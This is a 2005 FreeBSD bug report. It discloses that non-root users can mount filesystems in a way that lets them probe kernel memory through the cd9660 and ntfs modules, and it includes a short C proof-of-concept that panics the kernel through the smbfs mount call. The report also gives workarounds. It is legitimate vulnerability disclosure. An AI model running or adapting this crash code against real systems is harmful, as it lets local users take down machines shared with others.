kern/87010: Reading kernel memory & pagefault under non-root

Thu Oct 6 12:50:14 PDT 2005

>Number:         87010
>Category:       kern
>Synopsis:       Reading kernel memory & pagefault under non-root
>Confidential:   no
>Severity:       critical
>Priority:       medium
>Responsible:    freebsd-bugs
>State:          open
>Quarter:        
>Keywords:       
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Thu Oct 06 19:50:12 GMT 2005
>Closed-Date:
>Last-Modified:
>Originator:     Alexander Drozdov
>Release:        5.4-RELEASE-p6
>Organization:
>Environment:
FreeBSD sorcerer.my.domain 5.4-RELEASE-p6 FreeBSD 5.4-RELEASE-p6 #9: Thu Jul 28 09:55:49 MSD 2005     sorcerer at sorcerer.my.domain:/usr/obj/usr/src/sys/MYKERNEL_3  i386
>Description:
2 problems:
1. It is possible to pass to kernel addresses that can not be located
   in user space. There are no write operations to these addresses but
   there are strcmp operations with some in-kernel buffers. It allows
   user to get some information about kernel memory.

   Look at /usr/src/sys/isofs/cd9660/cd9660_vfsops.c:478

   cd9660_iconv->open(argp->cs_local, argp->cs_disk, &isomp->im_d2l);
   cd9660_iconv->open(argp->cs_disk, argp->cs_local, &isomp->im_l2d);

   Variables argp->cs_local and argp->cs_disk are the pointers that
   user passed to the kernel through mount call. 'open' function
   (/usr/src/sys/libkern/iconv.c) just uses strcmp function to
   compare these pointers with the charset encodings.

   NTFS module (/usr/src/sys/fs/ntfs) has the same behaviour. But, for
   example, msdosfs has not: 'copyinstr' function has been called before
   using the same buffers.

   Workaround: disallow non-root users to mount filesystems (sysctl
   vfs.usermount=0) OR compile kernel without static cd9660 and ntfs
   modules and do not load these modules via kldload. I have no
   information about working this vulnerability in jail.

2. The result of the program below is kernel panic. I just passed a bad
   but existed file descriptor (0) to SMBFS module through mount call.

#include <sys/param.h>
#include <sys/mount.h>
#include <errno.h>

struct smbfs_args {
        int             version;
        int             dev;
        u_int           flags;
        char            mount_point[MAXPATHLEN];
        u_char          root_path[512+1];
        uid_t           uid;
        gid_t           gid;
        mode_t          file_mode;
        mode_t          dir_mode;
        int             caseopt;
};

int main(int argc, char *argv[])
{
    int ret;
    struct smbfs_args ia;

    memset(&ia,0xff,sizeof(ia));
    ia.version=101012;
    ia.dev=0;
    ret=mount("smbfs","tmp",MNT_RDONLY,&ia);

    if(!ret)
        printf("Ok!\n");
    else
        printf("result = %i, errno = %i, %s\n", ret, errno,
strerror(errno));
    return 0;
}

   Workaround: disallow non-root users to mount filesystems (sysctl
   vfs.usermount=0) OR compile kernel without static smbfs module
   and do not load this module via kldload. I have no information
   about working this vulnerability in jail.
>How-To-Repeat:

>Fix:

>Release-Note:
>Audit-Trail:
>Unformatted: